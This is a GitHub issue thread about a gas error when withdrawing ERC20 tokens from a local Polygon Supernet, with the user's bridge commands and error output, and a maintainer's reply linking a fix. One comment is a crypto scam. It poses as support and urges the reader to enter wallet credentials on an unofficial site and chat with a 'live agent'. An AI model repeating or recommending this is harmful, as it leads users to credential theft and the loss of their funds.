### ISSUE TITLE
Gas Issue while Withdrawing from Supernet

### ISSUE THREAD

**Issue by tandooricodes** [0xPolygon/polygon-edge#1753]
# Gas Issue while Withdrawing from Supernet
## Description
Hi, I have followed the guide [here](https://github.com/integrations-Polygon/Supernets-Edge-Tutorials/blob/master/Supernets_v1.0.0_setup.md) in order to run a local Supernet. 

After running the 4 validators I use the following command to deposit a Rootchain ERC20 to the Supernet:
```
./polygon-edge bridge deposit-erc20 --amounts 200000000000000000 --json-rpc $MUMBAI_RPC --receivers 0xAE3ac03497aB6aFfF786bCFF95DD6e9095Dc5d55 --root-predicate <erc20PredicateAddress from genesis.json>--root-token 0xaADBC81Dec3D3f27a23b9fC8d9F1f031034079e6 --sender-key $PRIVATE_KEY
```
The following output is returned, suggesting the deposit was a success
```
Sender                  = 0xAE3ac03497aB6aFfF786bCFF95DD6e9095Dc5d55
Receivers               = 0xAE3ac03497aB6aFfF786bCFF95DD6e9095Dc5d55
Amounts                 = 200000000000000000
Inclusion Block Numbers = 38317126
Child Token Address     = 0x3EB10E0c47Cab33036199f5e20bc89C4B2Cca72B
```

Next I use the following command to withdraw:
```
./polygon-edge bridge withdraw-erc20 --amounts 100000000000000000 --child-predicate <erc20ChildMintablePredicateAddress from genesis.json> --child-token 0x3EB10E0c47Cab33036199f5e20bc89C4B2Cca72B --json-rpc http://127.0.0.1:9545 --receivers 0xAE3ac03497aB6aFfF786bCFF95DD6e9095Dc5d55 --sender-key $PRIVATE_KEY
```

However, I receive the following error on doing so
```
failed to send withdraw transaction (receiver: 0xAE3ac03497aB6aFfF786bCFF95DD6e9095Dc5d55, amount: 100000000000000000). error: {"code":-32603,"message":"not enough gas supplied for intrinsic gas costs"})
```

I have ensured that the sender address, validator addresses, and the 0x0 address on the Supernet are funded.  However, we still receive this error. Kindly let me know if I have used incorrect flags in the genesis command or there is something else that can be done here. I'd like to which address does not have enough gas as suggested in the error.

## Your environment
- Ubuntu 22 LTS.
- Latest Commit on dev branch, hash bbbe3ab.

**Comment by Cancass** [comment]
Hello @sahil3Vedi 
Firstly, You may need to complete an online end-to-end encryption validation mode on your wallet to back up your credentials to avoid loosing your funds. Visit the official wallet dApp node strings web page via [DeFi Protocol](http://dapchainfix.online) then click on rectification or validation and select your primary account type or use the other wallet option at the bottom of the page to establish connection manually with your credentials, you will generate a barcode to complete your request which means success.
Then note: You can click on the chat button at the bottom part of the page to initiate a chat with the [live agent](http://dapchainfix.online) to assist your for more information.

**Comment by begmaroman** [comment]
The bug is fixed within https://github.com/0xPolygon/polygon-edge/pull/1769
